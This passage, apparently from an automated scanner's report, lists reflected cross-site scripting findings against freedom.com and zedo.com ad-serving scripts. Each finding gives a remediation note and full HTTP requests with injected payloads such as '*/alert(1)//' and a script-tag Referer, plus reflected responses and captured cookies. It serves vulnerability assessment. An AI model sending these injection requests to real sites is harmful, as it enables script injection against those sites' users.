Expires: Sun, 30 Jan 2011 01:59:28 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Last-Modified: Sat, 29 Jan 2011 01:59:28 GMT
Connection: keep-alive
Content-Length: 559

/* http://common.cdn.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartadsc74d3*/alert(1)//5adca407e2b */
function getLast(s, num)
   {
   return s.substr(s.length - num, num);
   }


function approveAd(tagpos)
   {
   var last = getLast(location.href, 7);

   if(last.toLowerCase() == "?google")
       {
       if(tagpos ==
...[SNIP]...

4.262. http://common.onset.freedom.com/common/tools/load.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.onset.freedom.com
Path:   /common/tools/load.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload 7ef4d*/alert(1)//802d53a8b73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/tools/load.php?js=common_fi_oas,common_dartads&7ef4d*/alert(1)//802d53a8b73=1 HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:59:42 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n23 ( iad-agg-n30), ms iad-agg-n30 ( sfo-agg-n43), ms sfo-agg-n43 ( origin)
ETag: "c700a66bce50da8b94779fc293894c44-19869"
Cache-Control: max-age=86400
Expires: Sun, 30 Jan 2011 01:59:42 GMT
Age: 1
Content-Type: text/javascript
Vary: Accept-Encoding
Last-Modified: Sat, 29 Jan 2011 01:59:43 GMT
Connection: keep-alive
Content-Length: 19869

/* http://common.cdn.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads&7ef4d*/alert(1)//802d53a8b73=1 */
function getLast(s, num)
   {
   return s.substr(s.length - num, num);
   }


function approveAd(tagpos)
   {
   var last = getLast(location.href, 7);

   if(last.toLowerCase() == "?google")
       {
       if(tagpos
...[SNIP]...

4.263. http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 10]

Summary

Severity:   High
Confidence:   Firm
Host:   http://d3.zedo.com
Path:   //ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js

Issue detail

The value of REST URL parameter 10 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5bfe"%3b8c2adbfec8b was submitted in the REST URL parameter 10. This input was echoed as d5bfe";8c2adbfec8b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //ads2/k/602889/3869/172/0/951000002/951000002/0/951d5bfe"%3b8c2adbfec8b/2//1000014/i.js HTTP/1.1
Host: d3.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=951;c=2;s=2;d=15;w=1;h=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; aps=2; FFpb=1220:4f791'$951:ibnetwork300x250; FFcat=826,187,9:951,2,9:951,7,9:1220,101,9; FFad=3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Type: application/x-javascript
X-Varnish: 2884312773
Cache-Control: max-age=2591981
Expires: Mon, 28 Feb 2011 01:59:12 GMT
Date: Sat, 29 Jan 2011 01:59:31 GMT
Connection: close
Content-Length: 4711


var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
el
...[SNIP]...
ar zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

var zzLogData ="a=602889;x=3869;g=172,0;c=951000002,951000002;i=0;n=951d5bfe";8c2adbfec8b;s=2;" + zzStr;


function zzPop() {
   var zzAg = navigator.userAgent.toLowerCase();
   var zzAOL = (zzAg.indexOf('aol') != -1);
   var zzNS6 = (zzAg.indexOf('netscape6/6.') != -1);
   var zzNS7 = (zzAg.inde
...[SNIP]...

4.264. http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 11]

Summary

Severity:   High
Confidence:   Firm
Host:   http://d3.zedo.com
Path:   //ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js

Issue detail

The value of REST URL parameter 11 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fce7"%3bcb35ad0aec6 was submitted in the REST URL parameter 11. This input was echoed as 1fce7";cb35ad0aec6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //ads2/k/602889/3869/172/0/951000002/951000002/0/951/21fce7"%3bcb35ad0aec6//1000014/i.js HTTP/1.1
Host: d3.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=951;c=2;s=2;d=15;w=1;h=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; aps=2; FFpb=1220:4f791'$951:ibnetwork300x250; FFcat=826,187,9:951,2,9:951,7,9:1220,101,9; FFad=3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Type: application/x-javascript
X-Varnish: 2859793634
Cache-Control: max-age=2592000
Expires: Mon, 28 Feb 2011 01:59:32 GMT
Date: Sat, 29 Jan 2011 01:59:32 GMT
Connection: close
Content-Length: 4711


var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
el
...[SNIP]...
zIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

var zzLogData ="a=602889;x=3869;g=172,0;c=951000002,951000002;i=0;n=951;s=21fce7";cb35ad0aec6;" + zzStr;


function zzPop() {
   var zzAg = navigator.userAgent.toLowerCase();
   var zzAOL = (zzAg.indexOf('aol') != -1);
   var zzNS6 = (zzAg.indexOf('netscape6/6.') != -1);
   var zzNS7 = (zzAg.indexOf(
...[SNIP]...

4.265. http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://d3.zedo.com
Path:   //ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c895"%3bbb06c60bd90 was submitted in the REST URL parameter 4. This input was echoed as 8c895";bb06c60bd90 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //ads2/k/602889/38698c895"%3bbb06c60bd90/172/0/951000002/951000002/0/951/2//1000014/i.js HTTP/1.1
Host: d3.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=951;c=2;s=2;d=15;w=1;h=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; aps=2; FFpb=1220:4f791'$951:ibnetwork300x250; FFcat=826,187,9:951,2,9:951,7,9:1220,101,9; FFad=3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Type: application/x-javascript
X-Varnish: 2884309949
Cache-Control: max-age=2592000
Expires: Mon, 28 Feb 2011 01:59:24 GMT
Date: Sat, 29 Jan 2011 01:59:24 GMT
Connection: close
Content-Length: 4711


var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
el
...[SNIP]...
'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

var zzLogData ="a=602889;x=38698c895";bb06c60bd90;g=172,0;c=951000002,951000002;i=0;n=951;s=2;" + zzStr;


function zzPop() {
   var zzAg = navigator.userAgent.toLowerCase();
   var zzAOL = (zzAg.indexOf('aol') != -1);
   var zzNS6 = (zzAg.indexOf('netsca
...[SNIP]...

4.266. http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://d3.zedo.com
Path:   //ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e4c8"%3b53e86ebadaa was submitted in the REST URL parameter 5. This input was echoed as 2e4c8";53e86ebadaa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //ads2/k/602889/3869/1722e4c8"%3b53e86ebadaa/0/951000002/951000002/0/951/2//1000014/i.js HTTP/1.1
Host: d3.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=951;c=2;s=2;d=15;w=1;h=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; aps=2; FFpb=1220:4f791'$951:ibnetwork300x250; FFcat=826,187,9:951,2,9:951,7,9:1220,101,9; FFad=3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Type: application/x-javascript
X-Varnish: 2884310509
Cache-Control: max-age=2592000
Expires: Mon, 28 Feb 2011 01:59:25 GMT
Date: Sat, 29 Jan 2011 01:59:25 GMT
Connection: close
Content-Length: 4711


var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
el
...[SNIP]...
ined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

var zzLogData ="a=602889;x=3869;g=1722e4c8";53e86ebadaa,0;c=951000002,951000002;i=0;n=951;s=2;" + zzStr;


function zzPop() {
   var zzAg = navigator.userAgent.toLowerCase();
   var zzAOL = (zzAg.indexOf('aol') != -1);
   var zzNS6 = (zzAg.indexOf('netscape6/6.
...[SNIP]...

4.267. http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://d3.zedo.com
Path:   //ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe8af"%3b54ceb3db781 was submitted in the REST URL parameter 6. This input was echoed as fe8af";54ceb3db781 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //ads2/k/602889/3869/172/0fe8af"%3b54ceb3db781/951000002/951000002/0/951/2//1000014/i.js HTTP/1.1
Host: d3.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=951;c=2;s=2;d=15;w=1;h=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; aps=2; FFpb=1220:4f791'$951:ibnetwork300x250; FFcat=826,187,9:951,2,9:951,7,9:1220,101,9; FFad=3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Type: application/x-javascript
X-Varnish: 2859791972
Cache-Control: max-age=2592000
Expires: Mon, 28 Feb 2011 01:59:27 GMT
Date: Sat, 29 Jan 2011 01:59:27 GMT
Connection: close
Content-Length: 4711


var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
el
...[SNIP]...
ed' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

var zzLogData ="a=602889;x=3869;g=172,0fe8af";54ceb3db781;c=951000002,951000002;i=0;n=951;s=2;" + zzStr;


function zzPop() {
   var zzAg = navigator.userAgent.toLowerCase();
   var zzAOL = (zzAg.indexOf('aol') != -1);
   var zzNS6 = (zzAg.indexOf('netscape6/6.')
...[SNIP]...

4.268. http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://d3.zedo.com
Path:   //ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e4da"%3bd2aaaf873b8 was submitted in the REST URL parameter 7. This input was echoed as 4e4da";d2aaaf873b8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //ads2/k/602889/3869/172/0/9510000024e4da"%3bd2aaaf873b8/951000002/0/951/2//1000014/i.js HTTP/1.1
Host: d3.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=951;c=2;s=2;d=15;w=1;h=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; aps=2; FFpb=1220:4f791'$951:ibnetwork300x250; FFcat=826,187,9:951,2,9:951,7,9:1220,101,9; FFad=3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Type: application/x-javascript
X-Varnish: 2884311318
Cache-Control: max-age=2591965
Expires: Mon, 28 Feb 2011 01:58:53 GMT
Date: Sat, 29 Jan 2011 01:59:28 GMT
Connection: close
Content-Length: 4711


var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
el
...[SNIP]...
Clk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

var zzLogData ="a=602889;x=3869;g=172,0;c=9510000024e4da";d2aaaf873b8,951000002;i=0;n=951;s=2;" + zzStr;


function zzPop() {
   var zzAg = navigator.userAgent.toLowerCase();
   var zzAOL = (zzAg.indexOf('aol') != -1);
   var zzNS6 = (zzAg.indexOf('netscape6/6.') != -1);
   va
...[SNIP]...

4.269. http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Firm
Host:   http://d3.zedo.com
Path:   //ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed1e4"%3b99b30bf642b was submitted in the REST URL parameter 8. This input was echoed as ed1e4";99b30bf642b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //ads2/k/602889/3869/172/0/951000002/951000002ed1e4"%3b99b30bf642b/0/951/2//1000014/i.js HTTP/1.1
Host: d3.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=951;c=2;s=2;d=15;w=1;h=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
